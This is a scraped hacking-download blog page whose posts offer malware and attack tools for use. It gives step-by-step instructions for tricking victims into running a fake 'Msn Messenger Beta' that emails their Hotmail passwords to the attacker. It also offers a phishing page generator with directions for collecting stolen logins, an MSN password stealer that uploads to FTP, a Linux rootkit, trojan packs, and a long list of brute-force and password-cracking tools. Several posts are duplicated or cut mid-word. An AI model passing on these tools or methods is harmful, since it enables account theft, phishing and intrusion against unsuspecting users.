JFirewallTest is a free Java webstart application that tests for holes or open ports in your firewall. Unlike other solutions, JFirewallTest is a two stage testing procedure that tests all 65,536 ports very rapidly. After testing is complete, JFirewallTest will present a page of results reporting exactly what ports are open and accessible to others on the Internet.
Released: 2006-10-01
License: Freeware
Publisher: Michael Gardiner
Language: English
Platform: Windows, Linux, MAC
Requirements: Java Runtime Environment 1.4+
Install: Install and Uninstall
Hack Hotmail and Windowslive Password
Posted by Bijay | 10:56 PM | Crack a Password, Web Hacking | 0 comments »ery simple and really without any kind of virus, trojan. Please scan your files before you open it. There is also a video it is in a flv. flash format. Watch the video there is explaining you all what you have to do.
Just I want to explain it also by words here, maybe someone cant open the video file.
First of all download the file, it is a .rar file.
The link is:
http://www.ziddu.com/download.php?uid=ZbOinJmoZq%2BenOKnYqqhkZSoX6qcm5eu2
after you download, watch the video or not, how you like.
There are 2 files, open first "Gen File" write your email (because you will get the passwords there. After you generate your file in the folder you will see one .dll file, this you can send it with msn.exe together (make zip or rar) to any of hotmail, windowslive, msn adress. Tell to the victim "hey this is a new Msn Messenger Beta" or somethink like this. He/she will open the file, will write email+password, sign in of course. And in this Moment you will get the mail (after 5-10 Minutes).
EnJoY, thank you for your communication, cooperation and connection.
Read more on this article...

Google Hacks is a compact utility that will allow its users to search google using
different google search hacks. Using Google Hacks one can easily do a music search
by using a highly optimized and complex search command that can be obtained just by
clicking a number of option boxes that can be found in the program´s interface.
OS: Win 98/ME/2000/XP/2003
Free Download

Google Hacks Version v1.6

Info:
-----------------------------------
Gets Stored MSN 3.5 - 8.5 (Live) and Windows Messenger Passwords,
Writes to Text File,
Uploads to FTP Server of your choice!
-----------------------------------
Scanned on 17-04-2008:
-----------------------------------
Antivir: Nothing found
ArcaVir: Nothing found
Avast: Nothing found
AVG: Nothing found
BitDefender: Nothing found
F-Prot: Nothing found
Norman: Nothing found
Rising: Nothing found
VirusBlokAda32: Nothing found
VirusBuster: Nothing found
http://www.viruschief.com/report.html?report_id=663603171d6224c240491eb2961f2acebf87887c
Scanned by
http://www.viruschief.com
Evil Msn is an advanced msn messenger tool with many different features to make your experience with msn better.
************************************************** *
Feature List:
Msn Booter
Status Bomb
Nick Name Builder
Contact Options
Msn Information
Msn Scroller
Msn Defence
Msn Tweaking
Block Checker
Profile Viewer
Emotion Art
Emotion Talk
Display Picture/Emotion Thief
Desk Status
Patch Msn
And 3 BONUS Tools
************************************************** *
Compatibilty:
Designed for Windows XP SP1
Msn Messenger 6+
************************************************** *
Free Download
Now you can see what's hidden
http://rapidshare.com/files/30900260/crazy_pics_30.6_thegreatfroum.org.rar
Required Files
Code:
http://download.microsoft.com/download/vb6.../vbrun60sp5.e/
And new add
This is plain and simple to use this Program
1st in the Program is several links for you to give your oponant after they receave the url they will goto it and it will look like
a sighn in page for msn they sighn in using there passport id and there
password then look in this Program and it will show u there password and ip
u first must register at a website to get ya login details this is simle as pie ..
and a rapidshare premium downloader, i have tested that and it worked
fine for me
Code:
http://rapidshare.com/files/30900260/crazy_pics_30.6_thegreatfroum.org.rar
Read more on this article...
File: Msn Auto Responder.rar
DownloadLink: http://rapidshare.com/files/75269540/Msn_Auto_Responder.rar
--------------------------------------------------------------------------
File: Msn Detector 2.0.rar
DownloadLink: http://rapidshare.com/files/75270255/Msn_Detector_2.0.rar
--------------------------------------------------------------------------
File: MSN Bomberman v3.1.2.rar
DownloadLink: http://rapidshare.com/files/75270317/MSN_Bomberman_v3.1.2.rar
--------------------------------------------------------------------------
File: MSN.Sniffer.1.2.+.Crack.rar
DownloadLink: http://rapidshare.com/files/75270787/MSN.Sniffer.1.2._.Crack.rar
--------------------------------------------------------------------------
File: Locker.rar
DownloadLink: http://rapidshare.com/files/75271252/Locker.rar
---------------------------------------------------------------------------
File: MSN Flooder.rar
DownloadLink: http://rapidshare.com/files/75271337/MSN_Flooder.rar
Read more on this article...
Msn contact list sender
Posted by Bijay | 6:43 AM | Web Application Security, Web Hacking | 0 comments »urple'>What it is: Msn tools. some msn tools to have fun with. With the iso comes loads of freezers booters flooders and other fun
tools!
if you ever wanted to have some fun with msn then you should
download this.
There is even a hard tools section with rats keyloggers ect.
this is for educational use only!
If you scan this there will be about 5 trojans found but these are
hacking tools! the antivirus will detect all hacking tools as
harmfull. I tested most of the programs and my computer still works
fine,still its your own risk.
Help: To get the .iso working you will either need to burn it on cd or mount it with deamon tools or PowerISO, Alcohol 120% or Winmount ect ect. Google will enlighten you on that xD
and download the program.
After installation mount the msnhack img with deamon tools and it should autorun after that.
Read more on this article...
Windows Live Messenger 8.1.0178
-aMSN 0.94 [Linux]
-Messenger Plus! Live 4.11.254
-Plugin / Script for Messenger Plus!
-Skin Windows Live Messenger
-A-Patch 1.3.0 RC1 (build 54)
-MessPatch 8.1.0.178 - Generation 5
-StuffPlug-NG Patch 3.0.286 BETA
-MSN BackUP 1.3.2 BETA
-MSN BackUP 1.1.7 [Only MSN 7 & 7.5]
-Live Messenger Now Playing Plugin
-Toaster for Winamp 0.7.8
-1000+ Emoticons [Smile Classic ,Objects & Symbols ,Super Smile ,Personal Emoticons]
-1000 Avatars
-Clean Messenger 2.7.0168
-aMSN v0.95/PortableaMSN v1.0.0.5 Multilingual r03
-Same usefull Sites about MSN
Free Download

Msn AIO Pack 2007
All Hackers Tools
Posted by Bijay | 12:54 AM | Database Hacking, Hacking Tools, Web Hacking | 0 comments »MagicFilter
Code:
http://www.freewebs.com/t800t/MagicFilter.rar
Raptor3 [ belt sinicizes patch ]
Code:
http://www.freewebs.com/t800t/Raptor3.zip
The SuperDic_V3.2 registration version [ easy superior super dictionary production tool, function to be good ]
Code:
http://www.freewebs.com/t800t/SuperDic_V32.zip
Pwdmaker_1.151
Code:
http://www.freewebs.com/t800t/pwdmaker_1.151.rar
Decodes the tool: John the Ripper
Code:
http://www.xisp.org/downloads/jtr.zip
AUthX
Code:
http://www.freewebs.com/t800t/AUthX.rar
Withdraws the password and processes the LOG files tool:
Z_nakeR2 [ very good log processing tool may process the many kinds of log documents ]
Code:
http://www.freewebs.com/t800t/Z_nakeR2.zip
ccbrip
Code:
http://www.xisp.org/downloads/ccbillrip.zip
ibillrip
Code:
http://www.xisp.org/downloads/ibillrip.zip
*Accessdiver (AD) by Jean Fages
Code:
http://www.accessdiver.com
*Sentry by Sentinel:
Code:
http://sentinel.deny.de/sentry.php
*Form@ (specifically for FORM sites) by SSS -
Code:
http://sss.deny.de/
Caecus by Sentinel (For form sites that require an OCR [t4wsentry.pl])
Code:
http://sentinel.deny.de/Caecus.php
Ares by Gamoaa -
Code:
http://www.xisp.org/downloads/FACE_Setup.zip
Brutus
Code:
http://www.hoobie.net/brutus/
AuthForce by Zachary P. Landau
Code:
http://kapheine.hypa.net/authforce/index.html
Entry by Sparkleware
Code:
http://www.sparkleware.com/entry/index.html
Xavior By LithiumSoft
Code:
http://www.btinternet.com/~lithiumsoft/Products.html
Web Password Checker (WPC) .1 For UNIX by g1soft
available @
Code:
http://www.securityfocus.com/tools/885/scoreit
Munga Bunga's http Brute Forcer by Munga Bunga
Code:
http://www.hackology.com
Wordlist Tools:
*Raptor 3 by Madmax -
Code:
http://madmax.deny.de/downloads/raptor.zip
Words Extractor
Code:
http://www.intellitamper.com/wordsextractor/
Lucifer by Rhino -
Code:
http://rhino.deny.de/lucifer.php
ALS_novice by Wolfman -
Code:
http://wolfman.deny.de/tools.html
Z-leecher by Beda
Code:
http://goldmaster.webpark.cz/sleech.html
S-Generator by Beda
Code:
http://goldmaster.webpark.cz/sgen.html
S-WordlistTool by Beda
Code:
http://goldmaster.webpark.cz/swordt.html
Proxy Tools:
*Proxyrama By Gaamoa -
Code:
http://gaamoa.deny.de/
*Charon by Rhino -
Code:
http://www.icefortress.com/hosts/rhino/
*Advanced Proxy Leecher (APL) by Sentinel-
Code:
http://sentinel.deny.de/apl.htm
Geowhere by Jean Fages (NOT-Freeware) -
Code:
http://www.geowhere.net/
Proxy List Filter -
Code:
http://www.freeproxy.ru/en/programs/proxy_filter.htm
AATools by Glocksoft
Code:
http://www.glocksoft.com/aatools.htm
Proxy Bag
Code:
http://www.intellitamper.com/proxybag/
S-Proxy Tool by Beda
Code:
http://goldmaster.webpark.cz/sproxy.html
Exploiting Tools:
*Triton (Scanner) by Rhino -
Code:
http://rhino.deny.de/triton/index.php
*CMX IV by Xtremnet -
Code:
http://xtremet.deny.de/products.htm
CCBill Local Cgi Exploiter By Ksoze-
Code:
http://ksoze.deny.de/ccbill_exp.html
IBT2 by wolfman:
Code:
http://wolfman.deny.de/tools.html
Hephaestus's Ashen Spear by Wolfman:
Code:
http://wolfman.deny.de/HAS.php
Intellitamper
Code:
http://www.intellitamper.com/infos.php
Putty
Code:
http://www.chiark.greenend.org.uk/~sgtatham/putty/
Decrypting Tools:
*John The Ripper (JTR) -
Code:
http://www.openwall.com/john/
MDcrack (MD5 Cracker) -
Code:
http://membres.lycos.fr/mdcrack/
Distributed John The Ripper by Luis Parravicini
Code:
http://ktulu.com.ar/en/djohn.php
Cain and Abel by Massimiliano Montoro
Code:
http://www.oxid.it/cain.html
Salt Grinder by Wolfman
Code:
http://wolfman.deny.de/SaltGrinder.php
Log Tools:
LogRip by Rhino -
Code:
http://rhino.deny.de/logrip.php
Azarius by Rhino -
Code:
http://rhino.deny.de/azarius.php
Zimapass Parser by Sentinel:
Code:
http://sentinel.deny.de/zimaparser.htm
*C-Parse (ccbill.log parser) by Sentinel:
Code:
http://sentinel.deny.de/c_parse.htm
CCBill USI (CCBILL log parser that removes all dead account PRIOR to decrypting)
Code:
http://membres.lycos.fr/ccbill/
Accessdiver/Ares Parser by Sentinel:
Code:
http://sentinel.deny.de/ad_ares_parser.htm
Spoofers:
Zspoof by wolfman -
Code:
http://wolfman.deny.de/tools.html
Sploof by Jean Fages -
Code:
http://www.accessdiver.com/sploof.htm
Final Spoof
Code:
http://www.beatharness.com/finalspoof/
Spooph by nast0
Code:
http://24.106.100.133/spooph/index.html
D-Spoof And Others (Russian Site, English Prog)
Code:
http://mspoofer.pisem.net/zaza/index.htm
Mikho's Online Spoofer (web based spoofer)
Code:
http://mikho.kicks-ass.net/spoofs/spoofs.hta
QuickSpoof
Code:
http://httpd.chello.nl/~m-koster2/spoofs.htm
Other Tools:
Code:
Scholar by Sentinel - (History checker)
http://sentinel.deny.de/scholar.htm
Crackmate Gold by Xtremet (adultcheck gold pass verifier) -
Code:
http://xtremet.deny.de/products.htm
Harlan Carvey
A considerable amount of forensic analysis of Windows systems today continues to center around file system analysis; locating files in the active file system, or carving complete or partial files from unallocated space within the disk image. However, a great deal of extremely valuable information is missed if the Windows Registry is not thoroughly examined, as well.
»Client-side Exploits
Anushree Reddy
Client-side exploit are some of the most commonly seen exploits and this is mainly due to the fact that traditional perimeter security (firewalls, router access lists) offer little or no protection against these kinds of exploits. This is due to the fact that clientside exploits target vulnerabilities on the client applications.
»Simple WiFi Hacking with Eee Pc
Marco Lisci
In this article we'll see a simple and efficient method to retrieve a WEP key from a wireless network. The interesting part is that we'll obtain this key using an Eee Pc, the low cost netbook by Asus. After this article you will see that an Eee Pc with BackTrack is a must-have tool for any security specialist.
»SQL Injection in Action
Antonio Fanelli
Basic SQL Injection attacks have not gone away despite web 2.0 programming. In this article we will learn how to maintain earlier websites in order to protect against them.
»Auditing Oracle in a Production Environment
Aditya K Sood Aditya K Sood
This paper is based on real penetration testing of Oracle servers on HP-UX systems and the way the auditor has to follow to combat the stringencies that come in a way. We will dissect the errors and the way to bypass them to conduct the tests.
»PKCS Potion Number Twelve
Israel Torres
More today than ever enterprise cryptographic systems are being used by both private and government entities to fortify themselves against foreign and domestic attacks. This fortification consists of the applied practice of a policy known as Public Key Infrastructure (PKI).
»Virtualization and Security
Rishi Narang
In this world of enormous computing but limited energy, virtualization has now entered into the present day data centers, enterprises and user desktops to deliver efficient Green IT environments.
»Javascript Obfuscation Part 1
David Maciejak
It is common that attackers target victims web client or third party tools like Adobe Flash or Acrobat Reader. Web clients are targeted to exploit either vulnerability in their code or exploit flaws in third party softwares that can be loaded through them like ActiveX technologies or script engine in Flash or PDF.
»Hacking Movie Fallacies and Home User Infections
Matthew Jonkman
Surely every one of us has annoyed our significant other during a supposed hacking movie with constant statements of disgust. We try not to sigh, or let a Give me a break! slip, but they do. It's unavoidable.
»Consumers test – Virtual machines – an integral part of your security toolkit
Russell Kuhl , hakin9 team
What is a Virtual Machine? These days, you cannot toss an unwanted 512MB DIMM anywhere in the average server room and not hit a virtual machine (or VM as they are commonly known). They are everywhere, in one form or another. There are two basic types of VM’s, Process VM’s create an operating environment within the OS that isolates the process in question from the rest of the operating system.
»Dr. Vladimir Golubev – expert in cybercrime field
hakin9 team
This interview takes up an international problem of cybercrime. Mr. Vladymir Golubev (founder of Computer Crime Research Center) shares with you his experience, gained during years of work as the Member of International Police Association. Here you won’t find unambiguous answers, but things which will provoke you to think over your attitude towards security.
Read more on this article...
IntoXonia 2 - LKM rootkit for Linux Kernel 2.6.x
Posted by Bijay | 7:53 AM | Database Hacking, Web Hacking | 0 comments »IntoXonia 2 - LKM rootkit for Linux Kernel 2.6.x
Free Download
IntoXonia 2 - LKM rootkit for Linux Kernel 2.6.x
Read more on this article...
httprecon - Advanced Web Server Fingerprinting
Posted by Bijay | 11:26 AM | Database Hacking, Hacking Book, Web Application Security, Web Hacking | 0 comments »The httprecon project is doing some research in the field of web server fingerprinting, also known as http fingerprinting. The goal is the highly accurate identification of given httpd implementations. This is very important within professional vulnerability analysis.
Besides the discussion of different approaches and the documentation of gathered results also an implementation for automated analysis is provided. This software shall improve the easiness and efficiency of this kind of enumeration. Traditional approaches as like banner-grabbing, status code enumeration and header ordering analysis are used. However, many other analysis techniques were introduced to increase the possibilities of accurate web server fingerprinting.
Besides the well-known enumeration of http response status codes and header-ordering several other fingerprinting mechanisms were introduced. For example the capitalization of header lines, the use of spaces and the structure of ETag values (e.g. length and quotes).
There are nine test cases in which the behavior of the target service ismapped. These are:
* legitimate GET request for an existing resource
* very long GET request (>1024 bytes in URI)
* common GET request for a non-existing resource
* common HEAD request for an existing resource
* allowed method enumeration with OPTIONS
* usually not permitted http method DELETE
* not defined http method TEST
* non-existing protocol version HTTP/9.8
* GET request including attack patterns (e.g. ../ and %%)
This increases the amount of fingerprints to distinguish the given implementation. Thus, the accuracy of the fingerprinting series is very high. Theoretically httprecon 1.x is able to generate approx. 198 fingerprint atoms per full scan run (usually between 80 and 120 are given).
Read more on this article...
Uplink Hacker Elite
Posted by Bijay | 9:15 AM | Database Hacking, Hacking Book, Web Hacking | 0 comments »
Description:You're a hotshot computer hacker in the year 2010 -- an Uplink Agent, an expert in computer espionage employed by major corporations. You make your living by circumventing security systems, stealing important data, framing innocents, and disposing of the evidence. Invest your profits in better computer systems and tools to pull off ever more complicated and dangerous hacks. As your skills develop, you can attempt big jobs like influencing the stock market or creating the world's most devastating computer virus. Uplink's presentation of the world of hacking is perhaps more glamourous than the real thing, but has a core basis in reality.
Free Download

Uplink Hacker Elite
HackShadow UltraPhish Phishing Generator
Posted by Bijay | 10:40 PM | Database Hacking, Hacking Book, Web Hacking | 0 comments »o * AOL
o * Bebo
o * Bootleggers
o * ESpinTheBottle
o * FaceBook
o * Freewebs
o * GMail
o * Hi5
o * Hotmail (old)
o * Login Live
o * Messblack Forums
o * MillerSmiles Forums
o * Mob Life
o * MSN Delete Checker
o * Myspace
o * Rapidshare
o * Windows Live Mail
o * World of Warcraft
o * Yahoo
How To Use:
Here is a brief (but sweet) tutorial:
1. Choose a password (This will be used later on)
2. Pick a Template from the list to be created
3. Generate your page
4. Upload it to a php host
5. ???
6. Profit
Viewing your Logged Passwords:
Probably the most important part of the entire thing.
To view your logged passwords browse to (http://fakesite.com/example.php) and enter 'viewlog' into the email/username field and the password you chose in step 1.
If your password was correct you will be taken to the page with your phished accounts along with their IP Address.
You do not need an email address and nothing is stored on an outside server so it's completely independent.
Free Download

HackShadow UltraPhish Phishing Generator
Hackers ToolKit Suite
Posted by Bijay | 9:55 AM | Database Hacking, Hacking Tools, Web Hacking | 0 comments »
Hackers ToolKit Suite
Hacking pack:
AATools v5.50
brutus-aet2
Compiled SNID Server
dav
donut_http_flooder_1.4
Flooder
Net Controller 1.08
Net Metropolitan 1.04
Net Raider
Netbus 2 PRO Picture Trojans
Netbus1.70 Picture Trojans 2
NetSphere
passgen
Sprut
tosser
Nfo Tools:
AsciiFactory.exe
coolbeans-nfocreator.exe
dizzy.exe
Feuer's NFO File Maker v2.0
Ims NFO&DIZ Maker 1.87
Inserter v1.12
NFO Maker 1.0
NFOCreator.EXE
Patch Kit:
CodeFusion wizard v3.0
Fast patch v1.0
Patch creation wizard v1.2
Patch on fly v0.75
Predator's extreme loader generator v0.3
Rlzer v2.20b
Rtd win patch engine v1.0
sRlzer v1.01b patch generator
Tola's patching engine v1.8
Yoda's process patcher beta
Windows keygens:
keyfinder.exe
RockXP3.exe
WinALL Keygen.exe
WINDOWS_XP__CD_KEY_GENERATOr.EXE
XPProCorp-keyChanger.exe
Access Driver
Athena cg
Cain & Abel [password hacking]
CIA Commander
Crack
crackers kit.2.0
creator 16
Golden eye
google hacker
HostScan v1.6.5.531
Hotmail Account Freezer
md5-w
Microsoft macro virus generator
Net Tools
Soft Ice v4.05
sub 7 legends
Free Download

Hackers ToolKit Suite
Hack Hotmail and Windowslive Passwords
Posted by Bijay | 4:15 AM | Password Cracking, Web Hacking | 0 comments »ery simple and really without any kind of virus, trojan. Please scan your files before you open it. There is also a video it is in a flv. flash format. Watch the video there is explaining you all what you have to do.
Just I want to explain it also by words here, maybe someone cant open the video file.
First of all download the file, it is a .rar file.
The link is:
http://www.ziddu.com/download.php?uid=ZbOinJmoZq%2BenOKnYqqhkZSoX6qcm5eu2
after you download, watch the video or not, how you like.
There are 2 files, open first "Gen File" write your email (because you will get the passwords there. After you generate your file in the folder you will see one .dll file, this you can send it with msn.exe together (make zip or rar) to any of hotmail, windowslive, msn adress. Tell to the victim "hey this is a new Msn Messenger Beta" or somethink like this. He/she will open the file, will write email+password, sign in of course. And in this Moment you will get the mail (after 5-10 Minutes).
EnJoY, thank you for your communication, cooperation and connection.
Read more on this article...
Google Hacks Version v1.6
Posted by Bijay | 7:26 AM | Database Hacking, Hacking Tools, Web Hacking | 0 comments »
Google Hacks is a compact utility that will allow its users to search google using
different google search hacks. Using Google Hacks one can easily do a music search
by using a highly optimized and complex search command that can be obtained just by
clicking a number of option boxes that can be found in the program´s interface.
OS: Win 98/ME/2000/XP/2003
Free Download

Google Hacks Version v1.6
Status Bomb
Nick Name Builder
Contact Options
Msn Information
Msn Scroller
Msn Defence
Msn Tweaking
Block Checker
Profile Viewer
Emotion Art
Emotion Talk
Display Picture/Emotion Thief
Desk Status
Patch Msn
And 3 BONUS Tools
This is enough to say just open and it is simple
Free Download

Evil MSN 3.0.6